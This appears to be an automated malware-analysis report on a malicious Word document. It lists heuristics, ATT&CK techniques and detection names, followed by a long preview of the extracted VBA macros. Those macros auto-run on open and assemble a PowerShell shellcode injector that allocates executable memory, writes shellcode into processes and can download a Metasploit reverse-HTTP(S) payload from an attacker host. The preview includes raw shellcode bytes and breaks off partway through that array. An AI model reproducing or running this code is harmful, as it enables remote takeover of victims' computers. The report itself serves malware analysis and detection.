Verdict: MALICIOUS

Risk Score: 666

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that trigger on document open, including Auto_Open, AutoOpen, and Document_Open. These macros reference PowerShell and WMI (Win32_Process.Create) to execute a payload. Heuristics indicate the use of VirtualAlloc and WriteProcessMemory, suggesting the execution of shellcode. The ClamAV detection name 'Doc.Downloader.Pwshell-10001336-0' further supports the analysis of a downloader with PowerShell capabilities.
Heuristics (18)

- CVE-2007-3899 — Microsoft Word malformed string memory corruption (critical, CVE likely, CVE_2007_3899): Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- ClamAV: Doc.Downloader.Pwshell-10001336-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
- Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY): Reference to WriteProcessMemory API
- Reference to CreateRemoteThread API (critical, SC_STR_CREATEREMOTETHREAD): Reference to CreateRemoteThread API
- VBA macros detected (medium, 8 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `[Sy" CJikXH = CJikXH + "stem.Runtime.InteropServices.Marshal]::Copy($Shell" CJikXH = CJikXH + "code, 0, $BaseAddress, $Shellcode.Length)"`
- PowerShell reference in VBA (critical, OLE_VBA_PS): PowerShell reference in VBA. Matched line in script: `" CJikXH = CJikXH + " if ((!$IsWow64) -and $PowerShell32bit)" "`
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. Matched line in script: `strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup")`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen() asTf`
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Sub Document_Open() asTf`
- Auto_Open macro (low, OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `Attribute VB_Name = "NewMacros" Sub Auto_Open() asTf`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Reference to GetProcAddress API (high, SC_STR_GETPROCADDRESS): Reference to GetProcAddress API
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 105536 bytes |

SHA-256: ec6579d22cf12fcc385bdc7a9dd3ccef7177d395ceae1220ef1f9b4daedd31ac

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
asTf
End Sub
Sub AutoOpen()
asTf
End Sub
Sub Document_Open()
asTf
End Sub
Public Function asTf() As Variant
Dim CJikXH As String
CJikXH = "function Invoke-Shellcode"
{
[CmdletBinding( Defa"
CJikXH = CJikXH + "ultParameterSetName = 'RunLocal', SupportsShouldPr"
CJikXH = CJikXH + "ocess = $True , ConfirmImpact = 'High')] Param ("
"
CJikXH = CJikXH + " [ValidateNotNullOrEmpty()]"
[UInt16]
"
CJikXH = CJikXH + "$ProcessID,"
[Parameter( ParameterSetName = 'R"
CJikXH = CJikXH + "unLocal' )]"
[ValidateNotNullOrEmpty()]
["
CJikXH = CJikXH + "Byte[]]"
$Shellcode,
[Parameter( Paramete"
CJikXH = CJikXH + "rSetName = 'Metasploit' )]"
[ValidateSet( 'win"
CJikXH = CJikXH + "dows/meterpreter/reverse_http',"
"
CJikXH = CJikXH + " 'windows/meterpreter/reverse_https',"
"
CJikXH = CJikXH + " IgnoreCase = $True )]"
[String]
$P"
CJikXH = CJikXH + "ayload = 'windows/meterpreter/reverse_http',"
"
CJikXH = CJikXH + "[Parameter( ParameterSetName = 'ListPayloads' )]"
"
CJikXH = CJikXH + " [Switch]"
$ListMetasploitPayloads,
[P"
CJikXH = CJikXH + "arameter( Mandatory = $True,"
Para ""
CJikXH = CJikXH + "meterSetName = 'Metasploit' )]"
[ValidateNotNu"
CJikXH = CJikXH + "llOrEmpty()]"
[String]
$Lhost = '127.0.0."
CJikXH = CJikXH + "1',"
[Parameter( Mandatory = $True,
"
CJikXH = CJikXH + " ParameterSetName = 'Metasploit' )]"
[Va"
CJikXH = CJikXH + "lidateRange( 1,65535 )]"
[Int]
$Lport = 8"
CJikXH = CJikXH + "443,"
[Parameter( ParameterSetName = 'Metasplo"
CJikXH = CJikXH + "it' )]"
[ValidateNotNull()]
[String]
"
CJikXH = CJikXH + " $UserAgent = (Get-ItemProperty -Path 'HKCU:\Softw"
CJikXH = CJikXH + "are\Microsoft\Windows\CurrentVersion\Internet Sett"
CJikXH = CJikXH + "ings').'User Agent',"
[Parameter( ParameterSet"
CJikXH = CJikXH + "Name = 'Metasploit' )]"
[ValidateNotNull()]
"
CJikXH = CJikXH + " [Switch]"
$Legacy = $False,
[Parameter"
CJikXH = CJikXH + "( ParameterSetName = 'Metasploit' )]"
[Validat"
CJikXH = CJikXH + "eNotNull()]"
[Switch]
$Proxy = $False,
"
CJikXH = CJikXH + " [Switch]"
$Force = $False
)
Set-Stric"
CJikXH = CJikXH + "tMode -Version 2.0"
if ($PsCmdlet.ParameterSet"
CJikXH = CJikXH + "Name -eq 'ListPayloads')"
{
$Availabl"
CJikXH = CJikXH + "ePayloads = (Get-Command Invoke-Shellcode).Paramet"
CJikXH = CJikXH + "ers['Payload'].Attributes |"
Where-Obj"
CJikXH = CJikXH + "ect {$_.TypeId -eq [System.Management.Automation.V"
CJikXH = CJikXH + "alidateSetAttribute]}"
foreach ($Payload i"
CJikXH = CJikXH + "n $AvailablePayloads.ValidValues)"
{
"
CJikXH = CJikXH + " New-Object PSObject -Property @{ Payloads "
CJikXH = CJikXH + "= $Payload }"
}
Return
}
"
CJikXH = CJikXH + " if ( $PSBoundParameters['ProcessID'] )"
{
"
CJikXH = CJikXH + " Get-Process -Id $ProcessID -ErrorAction Sto"
CJikXH = CJikXH + "p | Out-Null"
}
function Local:Get-Delega"
CJikXH = CJikXH + "teType"
{
Param
(
"
CJikXH = CJikXH + " [OutputType([Type])]"
[Parameter( P"
CJikXH = CJikXH + "osition = 0)]"
[Type[]]
$"
CJikXH = CJikXH + "Parameters = (New-Object Type[](0)),"
"
CJikXH = CJikXH + "[Parameter( Position = 1 )]"
[Type]
"
CJikXH = CJikXH + " $ReturnType = [Void]"
)
"
CJikXH = CJikXH + " $Domain = [AppDomain]::CurrentDomain"
$D"
CJikXH = CJikXH + "ynAssembly = New-Object System.Reflection.Assembly"
CJikXH = CJikXH + "Name('ReflectedDelegate')"
$AssemblyBuilde"
CJikXH = CJikXH + "r = $Domain.DefineDynamicAssembly($DynAssembly, [S"
CJikXH = CJikXH + "ystem.Reflection.Emit.AssemblyBuilderAccess]::Run)"
CJikXH = CJikXH + ""
$ModuleBuilder = $AssemblyBuilder.Define"
CJikXH = CJikXH + "DynamicModule('InMemoryModule', $false)"
$"
CJikXH = CJikXH + "TypeBuilder = $ModuleBuilder.DefineType('MyDelegat"
CJikXH = CJikXH + "eType', 'Class, Public, Sealed, AnsiClass, AutoCla"
CJikXH = CJikXH + "ss', [System.MulticastDelegate])"
$Constru"
CJikXH = CJikXH + "ctorBuilder = $TypeBuilder.DefineConstructor('RTSp"
CJikXH = CJikXH + "ecialName, HideBySig, Public', [System.Reflection."
CJikXH = CJikXH + "CallingConventions]::Standard, $Parameters)"
"
CJikXH = CJikXH + " $ConstructorBuilder.SetImplementationFlags('Run"
CJikXH = CJikXH + "time, Managed')"
$MethodBuilder = $TypeBui"
CJikXH = CJikXH + "lder.DefineMethod('Invoke', 'Public, HideBySig, Ne"
CJikXH = CJikXH + "wSlot, Virtual', $ReturnType, $Parameters)"
"
CJikXH = CJikXH + " $MethodBuilder.SetImplementationFlags('Runtime, "
CJikXH = CJikXH + "Managed')"
Write-Output $TypeBuilder.Creat"
CJikXH = CJikXH + "eType()"
}
function Local:Get-ProcAddress"
CJikXH = CJikXH + ""
{
Param
(
[Ou"
CJikXH = CJikXH + "tputType([IntPtr])]"
[Parameter( Posit"
CJikXH = CJikXH + "ion = 0, Mandatory = $True )]"
[String"
CJikXH = CJikXH + "]"
$Module,
[Parameter( P"
CJikXH = CJikXH + "osition = 1, Mandatory = $True )]"
[St"
CJikXH = CJikXH + "ring]"
$Procedure
)
"
CJikXH = CJikXH + "$SystemAssembly = [AppDomain]::CurrentDomain.GetAs"
CJikXH = CJikXH + "semblies() |"
Where-Object { $_.Global"
CJikXH = CJikXH + "AssemblyCache -And $_.Location.Split('\\')[-1].Equ"
CJikXH = CJikXH + "als('System.dll') }"
$UnsafeNativeMethods "
CJikXH = CJikXH + "= $SystemAssembly.GetType('Microsoft.Win32.UnsafeN"
CJikXH = CJikXH + "ativeMethods')"
$GetModuleHandle = $Unsafe"
CJikXH = CJikXH + "NativeMethods.GetMethod('GetModuleHandle')"
"
CJikXH = CJikXH + " $GetProcAddress = $UnsafeNativeMethods.GetMethod"
CJikXH = CJikXH + "('GetProcAddress')"
$Kern32Handle = $GetMo"
CJikXH = CJikXH + "duleHandle.Invoke($null, @($Module))"
$tmp"
CJikXH = CJikXH + "Ptr = New-Object IntPtr"
$HandleRef = New-"
CJikXH = CJikXH + "Object System.Runtime.InteropServices.HandleRef($t"
CJikXH = CJikXH + "mpPtr, $Kern32Handle)"
Write-Output $GetPr"
CJikXH = CJikXH + "ocAddress.Invoke($null, @([System.Runtime.InteropS"
CJikXH = CJikXH + "ervices.HandleRef]$HandleRef, $Procedure))"
}
"
CJikXH = CJikXH + ""
function Local:Emit-CallThreadStub ([IntPtr] "
CJikXH = CJikXH + "$BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Archit"
CJikXH = CJikXH + "ecture)"
{
$IntSizePtr = $Architectur"
CJikXH = CJikXH + "e / 8"
function Local:ConvertTo-LittleEndi"
CJikXH = CJikXH + "an ([IntPtr] $Address)"
{
$Li"
CJikXH = CJikXH + "ttleEndianByteArray = New-Object Byte[](0)"
"
CJikXH = CJikXH + " $Address.ToString("X$($IntSizePtr*2)") -spli"
CJikXH = CJikXH + "t '([A-F0-9]{2})' | ForEach-Object { if ($_) { $Li"
CJikXH = CJikXH + "ttleEndianByteArray += [Byte] ('0x{0}' -f $_) } }"
"
CJikXH = CJikXH + ""
[System.Array]::Reverse($LittleEndian"
CJikXH = CJikXH + "ByteArray)"
Write-Output $LittleEndian"
CJikXH = CJikXH + "ByteArray"
}
$CallStub = New-Obje"
CJikXH = CJikXH + "ct Byte[](0)"
if ($IntSizePtr -eq 8)
"
CJikXH = CJikXH + " {"
[Byte[]] $CallStub = 0x48,0xB8 "
CJikXH = CJikXH + " # MOV QWORD RAX, &shellcode"
CJikXH = CJikXH + ""
$CallStub += ConvertTo-LittleEndian "
CJikXH = CJikXH + "$BaseAddr # &shellcode"
$CallStu"
CJikXH = CJikXH + "b += 0xFF,0xD0 # CALL"
CJikXH = CJikXH + " RAX"
$CallStub += 0x6A,0x00 "
CJikXH = CJikXH + " # PUSH BYTE 0"
$"
CJikXH = CJikXH + "CallStub += 0x48,0xB8 "
CJikXH = CJikXH + " # MOV QWORD RAX, &ExitThread"
$Call"
CJikXH = CJikXH + "Stub += ConvertTo-LittleEndian $ExitThreadAddr # &"
CJikXH = CJikXH + "ExitThread"
$CallStub += 0xFF,0xD0 "
CJikXH = CJikXH + " # CALL RAX"
}
"
CJikXH = CJikXH + " else"
{
[Byte[]] $Cal"
CJikXH = CJikXH + "lStub = 0xB8 # MOV DWO"
CJikXH = CJikXH + "RD EAX, &shellcode"
$CallStub += Conve"
CJikXH = CJikXH + "rtTo-LittleEndian $BaseAddr # &shellcode"
"
CJikXH = CJikXH + " $CallStub += 0xFF,0xD0 "
CJikXH = CJikXH + " # CALL EAX"
$CallStub += "
CJikXH = CJikXH + "0x6A,0x00 # PUSH BYT"
CJikXH = CJikXH + "E 0"
$CallStub += 0xB8 "
CJikXH = CJikXH + " # MOV DWORD EAX, &ExitThread"
"
CJikXH = CJikXH + ""
$CallStub += ConvertTo-LittleEndian $"
CJikXH = CJikXH + "ExitThreadAddr # &ExitThread"
$CallStu"
CJikXH = CJikXH + "b += 0xFF,0xD0 # CALL"
CJikXH = CJikXH + " EAX"
}
Write-Output $CallStub
"
CJikXH = CJikXH + " }"
function Local:Inject-RemoteShellcode ("
CJikXH = CJikXH + "[Int] $ProcessID)"
{
$hProcess = $Ope"
CJikXH = CJikXH + "nProcess.Invoke(0x001F0FFF, $false, $ProcessID) # "
CJikXH = CJikXH + "ProcessAccessFlags.All (0x001F0FFF)"
if (!"
CJikXH = CJikXH + "$hProcess)"
{
Throw "Unable t"
CJikXH = CJikXH + "o open a process handle for PID: $ProcessID"
"
CJikXH = CJikXH + " }"
$IsWow64 = $false
if ($64b"
CJikXH = CJikXH + "itCPU) # Only perform theses checks if CPU is 64-b"
CJikXH = CJikXH + "it"
{
$IsWow64Process.Invoke("
CJikXH = CJikXH + "$hProcess, [Ref] $IsWow64) | Out-Null"
"
CJikXH = CJikXH + " if ((!$IsWow64) -and $PowerShell32bit)"
"
CJikXH = CJikXH + " {"
Throw 'Unable to inject 64-b"
CJikXH = CJikXH + "it shellcode from within 32-bit Powershell. Use th"
CJikXH = CJikXH + "e 64-bit version of Powershell if you want this to"
CJikXH = CJikXH + " work.'"
}
elseif ($IsWow"
CJikXH = CJikXH + "64) # 32-bit Wow64 process"
{
"
CJikXH = CJikXH + " if ($Shellcode32.Length -eq 0)"
"
CJikXH = CJikXH + " {"
Throw 'No shellcode "
CJikXH = CJikXH + "was placed in the $Shellcode32 variable!'"
"
CJikXH = CJikXH + " }"
$Shellcode = $Shellcod"
CJikXH = CJikXH + "e32"
}
else # 64-bit proc"
CJikXH = CJikXH + "ess"
{
if ($Shellcode"
CJikXH = CJikXH + "64.Length -eq 0)"
{
"
CJikXH = CJikXH + " Throw 'No shellcode was placed in the $Shel"
CJikXH = CJikXH + "lcode64 variable!'"
}
"
CJikXH = CJikXH + " $Shellcode = $Shellcode64"
}
"
CJikXH = CJikXH + " }"
else # 32-bit CPU
{
"
CJikXH = CJikXH + " if ($Shellcode32.Length -eq 0)"
"
CJikXH = CJikXH + " {"
Throw 'No shellcode was place"
CJikXH = CJikXH + "d in the $Shellcode32 variable!'"
}
"
CJikXH = CJikXH + " $Shellcode = $Shellcode32"
}
"
CJikXH = CJikXH + " $RemoteMemAddr = $VirtualAllocEx.Invoke($hP"
CJikXH = CJikXH + "rocess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3"
CJikXH = CJikXH + "000, 0x40) # (Reserve|Commit, RWX)"
if (!$"
CJikXH = CJikXH + "RemoteMemAddr)"
{
Throw "Unab"
CJikXH = CJikXH + "le to allocate shellcode memory in PID: $ProcessID"
CJikXH = CJikXH + ""
}
$WriteProcessMemory.Invoke($"
CJikXH = CJikXH + "hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.L"
CJikXH = CJikXH + "ength, [Ref] 0) | Out-Null"
$ExitThreadAdd"
CJikXH = CJikXH + "r = Get-ProcAddress kernel32.dll ExitThread"
"
CJikXH = CJikXH + " if ($IsWow64)"
{
$CallStub"
CJikXH = CJikXH + " = Emit-CallThreadStub $RemoteMemAddr $ExitThreadA"
CJikXH = CJikXH + "ddr 32"
}
Else
{
"
CJikXH = CJikXH + " $CallStub = Emit-CallThreadStub $RemoteMemAd"
CJikXH = CJikXH + "dr $ExitThreadAddr 64"
}
$RemoteS"
CJikXH = CJikXH + "tubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPt"
CJikXH = CJikXH + "r]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reser"
CJikXH = CJikXH + "ve|Commit, RWX)"
if (!$RemoteStubAddr)
"
CJikXH = CJikXH + " {"
Throw "Unable to allocate thr"
CJikXH = CJikXH + "ead call stub memory in PID: $ProcessID"
"
CJikXH = CJikXH + "}"
$WriteProcessMemory.Invoke($hProcess, $"
CJikXH = CJikXH + "RemoteStubAddr, $CallStub, $CallStub.Length, [Ref]"
CJikXH = CJikXH + " 0) | Out-Null"
$ThreadHandle = $CreateRem"
CJikXH = CJikXH + "oteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $Re"
CJikXH = CJikXH + "moteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)"
"
CJikXH = CJikXH + " if (!$ThreadHandle)"
{
"
CJikXH = CJikXH + " Throw "Unable to launch remote thread in PID: $P"
CJikXH = CJikXH + "rocessID"
}
$CloseHandle.Invoke("
CJikXH = CJikXH + "$hProcess) | Out-Null"
}
function Local:I"
CJikXH = CJikXH + "nject-LocalShellcode"
{
if ($PowerShe"
CJikXH = CJikXH + "ll32bit) {"
if ($Shellcode32.Length -e"
CJikXH = CJikXH + "q 0)"
{
Throw 'No she"
CJikXH = CJikXH + "llcode was placed in the $Shellcode32 variable!'"
"
CJikXH = CJikXH + " return"
}
"
CJikXH = CJikXH + " $Shellcode = $Shellcode32"
}
els ""
CJikXH = CJikXH + "e"
{
if ($Shellcode64.Length "
CJikXH = CJikXH + "-eq 0)"
{
Throw 'No s"
CJikXH = CJikXH + "hellcode was placed in the $Shellcode64 variable!'"
CJikXH = CJikXH + ""
Return
}
"
CJikXH = CJikXH + " $Shellcode = $Shellcode64"
}
$"
CJikXH = CJikXH + "BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero,"
CJikXH = CJikXH + " $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|C"
CJikXH = CJikXH + "ommit, RWX)"
if (!$BaseAddress)
{"
CJikXH = CJikXH + ""
Throw "Unable to allocate shellcode "
CJikXH = CJikXH + "memory in PID: $ProcessID"
}
[Sy"
CJikXH = CJikXH + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
CJikXH = CJikXH + "code, 0, $BaseAddress, $Shellcode.Length)"
"
CJikXH = CJikXH + " $ExitThreadAddr = Get-ProcAddress kernel32.dll Ex"
CJikXH = CJikXH + "itThread"
if ($PowerShell32bit)
{"
CJikXH = CJikXH + ""
$CallStub = Emit-CallThreadStub $Bas"
CJikXH = CJikXH + "eAddress $ExitThreadAddr 32"
}
el ""
CJikXH = CJikXH + "se"
{
$CallStub = Emit-CallTh"
CJikXH = CJikXH + "readStub $BaseAddress $ExitThreadAddr 64"
"
CJikXH = CJikXH + "}"
$CallStubAddress = $VirtualAlloc.Invoke"
CJikXH = CJikXH + "([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x4"
CJikXH = CJikXH + "0) # (Reserve|Commit, RWX)"
if (!$CallStub"
CJikXH = CJikXH + "Address)"
{
Throw "Unable to "
CJikXH = CJikXH + "allocate thread call stub."
}
[S"
CJikXH = CJikXH + "ystem.Runtime.InteropServices.Marshal]::Copy($Call"
CJikXH = CJikXH + "Stub, 0, $CallStubAddress, $CallStub.Length)"
"
CJikXH = CJikXH + " $ThreadHandle = $CreateThread.Invoke([IntPtr]:"
CJikXH = CJikXH + ":Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntP"
CJikXH = CJikXH + "tr]::Zero)"
if (!$ThreadHandle)
{"
CJikXH = CJikXH + ""
Throw "Unable to launch thread."
"
CJikXH = CJikXH + " }"
$WaitForSingleObject.Invoke($Thre"
CJikXH = CJikXH + "adHandle, 0xFFFFFFFF) | Out-Null"
$Virtual"
CJikXH = CJikXH + "Free.Invoke($CallStubAddress, $CallStub.Length + 1"
CJikXH = CJikXH + ", 0x8000) | Out-Null # MEM_RELEASE (0x8000)"
"
CJikXH = CJikXH + " $VirtualFree.Invoke($BaseAddress, $Shellcode.Le"
CJikXH = CJikXH + "ngth + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000"
CJikXH = CJikXH + ")"
}
$IsWow64ProcessAddr = Get-ProcAddres"
CJikXH = CJikXH + "s kernel32.dll IsWow64Process"
if ($IsWow64Pro"
CJikXH = CJikXH + "cessAddr)"
{
$IsWow64ProcessDelegate "
CJikXH = CJikXH + "= Get-DelegateType @([IntPtr], [Bool].MakeByRefTyp"
CJikXH = CJikXH + "e()) ([Bool])"
$IsWow64Process = [System.R"
CJikXH = CJikXH + "untime.InteropServices.Marshal]::GetDelegateForFun"
CJikXH = CJikXH + "ctionPointer($IsWow64ProcessAddr, $IsWow64ProcessD"
CJikXH = CJikXH + "elegate)"
$64bitCPU = $true
}
el ""
CJikXH = CJikXH + "se"
{
$64bitCPU = $false
}
"
CJikXH = CJikXH + "if ([IntPtr]::Size -eq 4)"
{
$PowerSh"
CJikXH = CJikXH + "ell32bit = $true"
}
Else
{
"
CJikXH = CJikXH + "$PowerShell32bit = $false"
}
if ($PsCmdle"
CJikXH = CJikXH + "t.ParameterSetName -eq 'Metasploit')"
{
"
CJikXH = CJikXH + " if (!$PowerShell32bit) {"
$RootInvo"
CJikXH = CJikXH + "cation = $MyInvocation.Line"
$Response"
CJikXH = CJikXH + " = $True"
if ( $Force -or ( $Response "
CJikXH = CJikXH + "= $psCmdlet.ShouldContinue( "Do you want to launch"
CJikXH = CJikXH + " the payload from x86 Powershell?",
"
CJikXH = CJikXH + " "Attempt to execute 32-bit shellcode from 64"
CJikXH = CJikXH + "-bit Powershell. Note: This process takes about on"
CJikXH = CJikXH + "e minute. Be patient! You will also see some artif"
CJikXH = CJikXH + "acts of the script loading in the other process." "
CJikXH = CJikXH + ") ) ) { }"
if ( !$Response )
"
CJikXH = CJikXH + " {"
Return
}
"
CJikXH = CJikXH + " if ($MyInvocation.BoundParameters['Force']"
CJikXH = CJikXH + ")"
{
$Command = "func"
CJikXH = CJikXH + "tion $($MyInvocation.InvocationName) {`n" + $MyInv"
CJikXH = CJikXH + "ocation.MyCommand.ScriptBlock + "`n}`n$($RootInvoc"
CJikXH = CJikXH + "ation)`n`n"
}
Else
"
CJikXH = CJikXH + " {"
$Command = "function $("
CJikXH = CJikXH + "$MyInvocation.InvocationName) {`n" + $MyInvocation"
CJikXH = CJikXH + ".MyCommand.ScriptBlock + "`n}`n$($RootInvocation) "
CJikXH = CJikXH + "-Force`n`n"
}
$CommandBy"
CJikXH = CJikXH + "tes = [System.Text.Encoding]::Ascii.GetBytes($Comm"
CJikXH = CJikXH + "and)"
$EncodedCommand = [Convert]::ToB"
CJikXH = CJikXH + "ase64String($CommandBytes)"
$Execute ="
CJikXH = CJikXH + " '$Command' + " | $Env:windir\SysWOW64\WindowsPowe"
CJikXH = CJikXH + "rShell\v1.0\powershell.exe -NoProfile -Command -"
"
CJikXH = CJikXH + ""
Invoke-Expression -Command $Execute |"
CJikXH = CJikXH + " Out-Null"
Return
}
"
CJikXH = CJikXH + "$Response = $True"
if ( $Force -or ( $Resp"
CJikXH = CJikXH + "onse = $psCmdlet.ShouldContinue( "Do you know what"
CJikXH = CJikXH + " you're doing?",
"About to downloa"
CJikXH = CJikXH + "d Metasploit payload '$($Payload)' LHOST=$($Lhost)"
CJikXH = CJikXH + ", LPORT=$($Lport)" ) ) ) { }
if ( !$Respo"
CJikXH = CJikXH + "nse )"
{
Return
}
"
CJikXH = CJikXH + " switch ($Payload)"
{
'"
CJikXH = CJikXH + "windows/meterpreter/reverse_http'"
{
"
CJikXH = CJikXH + " $SSL = ''"
}
"
CJikXH = CJikXH + " 'windows/meterpreter/reverse_https'"
"
CJikXH = CJikXH + " {"
$SSL = 's'
"
CJikXH = CJikXH + "[System.Net.ServicePointManager]::ServerCertificat"
CJikXH = CJikXH + "eValidationCallback = {$True}"
}
"
CJikXH = CJikXH + " }"
if ($Legacy)
{
"
CJikXH = CJikXH + " $Request = "http$($SSL)://$($Lhost):$($Lport)/I"
CJikXH = CJikXH + "NITM"
} else {
$CharArray = "
CJikXH = CJikXH + "48..57 + 65..90 + 97..122 | ForEach-Object {[Char]"
CJikXH = CJikXH + "$_}"
$SumTest = $False
wh ""
CJikXH = CJikXH + "ile ($SumTest -eq $False) "
{
"
CJikXH = CJikXH + " $GeneratedUri = $CharArray | Get-Random -"
CJikXH = CJikXH + "Count 4"
$SumTest = (([int[]] $Gen"
CJikXH = CJikXH + "eratedUri | Measure-Object -Sum).Sum % 0x100 -eq 9"
CJikXH = CJikXH + "2)"
}
$RequestUri = -join"
CJikXH = CJikXH + " $GeneratedUri"
$Request = "http$($SSL"
CJikXH = CJikXH + ")://$($Lhost):$($Lport)/$($RequestUri)"
"
CJikXH = CJikXH + "}"
$Uri = New-Object Uri($Request)
"
CJikXH = CJikXH + " $WebClient = New-Object System.Net.WebClient"
"
CJikXH = CJikXH + " $WebClient.Headers.Add('user-agent', "$UserA"
CJikXH = CJikXH + "gent")
if ($Proxy)
{
"
CJikXH = CJikXH + " $WebProxyObject = New-Object System.Net.WebProxy"
CJikXH = CJikXH + ""
$ProxyAddress = (Get-ItemProperty -P"
CJikXH = CJikXH + "ath 'HKCU:\Software\Microsoft\Windows\CurrentVersi"
CJikXH = CJikXH + "on\Internet Settings').ProxyServer"
if"
CJikXH = CJikXH + " ($ProxyAddress) "
{
"
CJikXH = CJikXH + "$WebProxyObject.Address = $ProxyAddress"
"
CJikXH = CJikXH + " $WebProxyObject.UseDefaultCredentials = $Tr"
CJikXH = CJikXH + "ue"
$WebClientObject.Proxy = $WebP"
CJikXH = CJikXH + "roxyObject"
}
}
try
"
CJikXH = CJikXH + ""
{
[Byte[]] $Shellcode32 = $W"
CJikXH = CJikXH + "ebClient.DownloadData($Uri)"
}
ca ""
CJikXH = CJikXH + "tch"
{
Throw "$($Error[0].Exc"
CJikXH = CJikXH + "eption.InnerException.InnerException.Message)"
"
CJikXH = CJikXH + " }"
[Byte[]] $Shellcode64 = $Shellcod"
CJikXH = CJikXH + "e32"
}
elseif ($PSBoundParameters['Shellc"
CJikXH = CJikXH + "ode'])"
{
[Byte[]] $Shellcode32 = $Sh"
CJikXH = CJikXH + "ellcode"
[Byte[]] $Shellcode64 = $Shellcod"
CJikXH = CJikXH + "e32"
}
Else
{
[Byte[]] $She"
CJikXH = CJikXH + "llcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x"
CJikXH = CJikXH + "89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,"
"
CJikXH = CJikXH + " 0x52,0x0c,0x8b,0x52,0"
CJikXH = CJikXH + "x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0"
CJikXH = CJikXH + "x31,0xc0,"
0 xac , ""
CJikXH = CJikXH + "0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,"
CJikXH = CJikXH + "0xc7,0xe2,0xf0,0x52,0x57,"
"
CJikXH = CJikXH + " 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0"
CJikXH = CJikXH + ",0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,"
"
CJikXH = CJikXH + " 0xd0,0x50,0x8b,0x48,0x1"
CJikXH = CJikXH + "8,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x3"
CJikXH = CJikXH + "4,0x8b,"
0x01,0x"
CJikXH = CJikXH + "d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x"
CJikXH = CJikXH + "c7,0x38,0xe0,0x75,0xf4,"
"
CJikXH = CJikXH + " 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0"
CJikXH = CJikXH + "x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,"
"
CJikXH = CJikXH + " 0x0c,0x4b,0x8b,0x58,0x1c,"
CJikXH = CJikXH + "0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"
CJikXH = CJikXH + "0x24,"
0x5b,0x5b"
CJikXH = CJikXH + ",0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b"
CJikXH = CJikXH + ",0x12,0xeb,0x86,0x5d,"
"
